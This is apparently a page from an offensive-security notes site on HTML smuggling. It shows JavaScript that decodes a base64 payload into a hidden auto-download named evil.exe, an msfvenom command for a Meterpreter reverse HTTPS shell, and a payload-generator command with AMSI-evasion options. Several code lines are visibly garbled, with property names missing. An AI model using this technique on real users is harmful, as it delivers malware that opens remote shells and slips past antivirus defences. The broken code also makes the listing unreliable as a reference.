Comment on page

HTML Smuggling

  1. 1.
    Base64 code is placed into an array buffer, byte-by-byte.
  2. 2.
    The array buffer is placed into the binary blob.
  3. 3.
    A hidden a tag is created.
  4. 4.
    The data from the binary blob is moved to the href reference of the a tag.
  5. 5.
    The code from the binary blob is given the file name of evil.exe.
  6. 6.
    Finally, a click action is performed to download the file.
function base64ToArrayBuffer(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array( len );
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
return bytes.buffer;
// msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 -f exe -o evil.exe
// base64 -w0 evil.exe | xclip -i -sel clipboard
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = 'evil.exe';
var a = document.createElement('a');
document.body.appendChild(a); = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url; = fileName;;
This page will work when browsed with Google Chrome (since it supports window.URL.createObjectURL). This technique must be modified to work against browsers like IE or Microsoft Edge.


$ python --payload js --delivery web --output evil --web --shellcode --scfile evil.bin --smuggle --template mcafee --dotnetver 4 --amsi amsienable
Last modified 2yr ago